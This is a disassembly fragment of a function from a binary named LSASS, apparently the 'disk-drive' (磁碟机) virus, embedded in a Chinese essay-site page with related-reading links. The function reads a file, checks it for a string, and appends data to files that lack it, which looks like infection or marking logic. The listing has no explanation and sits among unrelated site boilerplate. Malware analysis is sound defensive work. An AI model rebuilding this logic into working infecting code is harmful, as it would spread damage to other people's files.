00402BAB |. 6A 01 PUSH 1

00402BAD |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]

00402BB0 |. 5B POP EBX

00402BB1 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX

00402BB4 |. E8 4F590000 CALL <JMP.&MFC42.#540_??0CString@@QAE@X>

00402BB9 |. A1 18A34000 MOV EAX,DWORD PTR DS:[<&MSVCIRT.?openpr>

00402BBE |. 53 PUSH EBX

00402BBF |. 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]

00402BC2 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2

00402BC6 |. FF30 PUSH DWORD PTR DS:[EAX]

00402BC8 |. 53 PUSH EBX

00402BC9 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]

00402BCC |. FF15 14A34000 CALL DWORD PTR DS:[<&MSVCIRT.??0ifstrea>; MSVCIRT.??0ifstream@@QAE@PBDHH@Z

00402BD2 |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]

00402BD5 |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3

00402BD9 |. 85C0 TEST EAX,EAX

00402BDB |. 74 0A JE SHORT LSASS.00402BE7

00402BDD |. 8B45 94 MOV EAX,DWORD PTR SS:[EBP-6C]

00402BE0 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]

00402BE3 |. 8D4405 94 LEA EAX,DWORD PTR SS:[EBP+EAX-6C]

00402BE7 |> F640 08 06 TEST BYTE PTR DS:[EAX+8],6

00402BEB |. 0F85 A4000000 JNZ LSASS.00402C95

00402BF1 |. 85C0 TEST EAX,EAX

00402BF3 |. 0F84 9C000000 JE LSASS.00402C95

00402BF9 |. 68 10F44000 PUSH LSASS.0040F410

00402BFE |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]

00402C01 |. E8 165A0000 CALL <JMP.&MFC42.#860_??4CString@@QAEAB>

00402C06 |> 8B45 94 /MOV EAX,DWORD PTR SS:[EBP-6C]

00402C09 |. 8B40 04 |MOV EAX,DWORD PTR DS:[EAX+4]

00402C0C |. 845C05 9C |TEST BYTE PTR SS:[EBP+EAX-64],BL

00402C10 |. 75 28 |JNZ SHORT LSASS.00402C3A

00402C12 |. 6A 0A |PUSH 0A

00402C14 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]

00402C1A |. 68 00040000 |PUSH 400

00402C1F |. 50 |PUSH EAX

00402C20 |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]

00402C23 |. FF15 10A34000 |CALL DWORD PTR DS:[<&MSVCIRT.?getline@>; MSVCIRT.?getline@istream@@QAEAAV1@PAEHD@Z

00402C29 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]

00402C2F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]

00402C32 |. 50 |PUSH EAX

00402C33 |. E8 0E5A0000 |CALL <JMP.&MFC42.#941_??YCString@@QAEA>

00402C38 |.^ EB CC /JMP SHORT LSASS.00402C06

00402C3A |> 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]

00402C3D |. FF15 0CA34000 CALL DWORD PTR DS:[<&MSVCIRT.?close@ifs>; MSVCIRT.?close@ofstream@@QAEXXZ

00402C43 |. FF75 0C PUSH DWORD PTR SS:[EBP+C]

00402C46 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]

00402C49 |. E8 C2590000 CALL <JMP.&MFC42.#2764_?Find@CString@@Q>

00402C4E |. 83F8 FF CMP EAX,-1

00402C51 |. 75 42 JNZ SHORT LSASS.00402C95

00402C53 |. 8B86 B8010000 MOV EAX,DWORD PTR DS:[ESI+1B8]

00402C59 |. 81C6 B8010000 ADD ESI,1B8

00402C5F |. 6A 00 PUSH 0

00402C61 |. 53 PUSH EBX

00402C62 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]

00402C65 |. 8BCE MOV ECX,ESI

00402C67 |. FF50 28 CALL DWORD PTR DS:[EAX+28] ; openfile

00402C6A |. 85C0 TEST EAX,EAX

00402C6C |. 74 27 JE SHORT LSASS.00402C95

00402C6E |. 8B06 MOV EAX,DWORD PTR DS:[ESI]

00402C70 |. 6A 02 PUSH 2

00402C72 |. 6A 00 PUSH 0

00402C74 |. 8BCE MOV ECX,ESI

00402C76 |. FF50 30 CALL DWORD PTR DS:[EAX+30] ; seekfile

00402C79 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]

00402C7C |. 8B16 MOV EDX,DWORD PTR DS:[ESI]

00402C7E |. 8B48 F8 MOV ECX,DWORD PTR DS:[EAX-8]

00402C81 |. 51 PUSH ECX

00402C82 |. 50 PUSH EAX

00402C83 |. 8BCE MOV ECX,ESI

00402C85 |. FF52 40 CALL DWORD PTR DS:[EDX+40] ; writefile

00402C88 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]

00402C8A |. 8BCE MOV ECX,ESI

00402C8C |. FF50 54 CALL DWORD PTR DS:[EAX+54] ; close

00402C8F |. FF05 08F44000 INC DWORD PTR DS:[40F408]

00402C95 |> 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]

00402C98 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2

00402C9C |. FF15 08A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ifstrea>; MSVCIRT.??1ifstream@@UAE@XZ

00402CA2 |. 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]

00402CA5 |. FF15 04A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ios@@UA>; MSVCIRT.??1ios@@UAE@XZ

00402CAB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]

00402CAE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL

00402CB1 |. E8 46580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>

00402CB6 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0

00402CBA |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]

00402CBD |. E8 3A580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>

00402CC2 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF

00402CC6 |. 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]

00402CC9 |. E8 2E580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>

00402CCE |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]

00402CD1 |. 5E POP ESI

00402CD2 |. 5B POP EBX

00402CD3 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX

00402CDA |. C9 LEAVE

00402CDB /. C2 0800 RETN 8

本内容不代表本网观点和政治立场，如有侵犯你的权益请联系我们处理。

网友评论

网友评论仅供其表达个人看法，并不表明网站立场。

相关阅读

如何判断电脑已感染“磁碟机”病毒？

2022-08-16

“磁碟机”病毒疫情紧急!已有超过5万台电脑被感染

2022-09-30

磁碟机病毒分析

2021-05-07

“磁碟机”病毒分析报告

2020-05-08

扩展阅读

: 新型冠状感染肺炎隔离方式新型冠状病毒的介绍

: 重庆按照“四集中”方式救治新型冠状病毒感染的肺炎患者

: 猪巨细胞病毒感染的流行病学调查与分析

: 西藏自治区纪委监委关于新型冠状病毒感染疫情防控期间以来信电话和网络方式接待群众

: 新冠病毒的遗传分析为科学家提供了有关其传播方式的线索

: 疱疹病毒感染：了解疱疹及其病毒特征

最近发布

读后感女神2000字

2024-08-06

优秀共产党员先进事迹材料2000字

2024-08-06

关于平安夜的作文：平安夜2000字作文

2024-08-06

关于亲情的好句好段2000字

2024-08-05

新课程培训学习总结2000字

2024-08-05

高考作文神作：他755字满分文章令老师惊叹阅卷组近2000字详尽注解

2024-08-05

推荐专题

读后感 2000字左右礼仪论文 2000字实训心得 2000字尘埃落定读后感 2000字大国崛起观后感 2000字学生检讨书 2000字梦的解析读后感 2000字读后感 2000字左右大全大学生礼仪论文 2000字国家安全 2000字论文大学生活规划 2000字论语读后感 2000字学生上课迟到检讨书 2000字社会调查报告 2000字个人成长报告 2000字论文

猜你喜欢：

展开

2000字范文免责声明© 2024 All Rights Reserved.

湘ICP备2024057051号网站地图XML

© 2024 All Rights Reserved.

2000字范文免责声明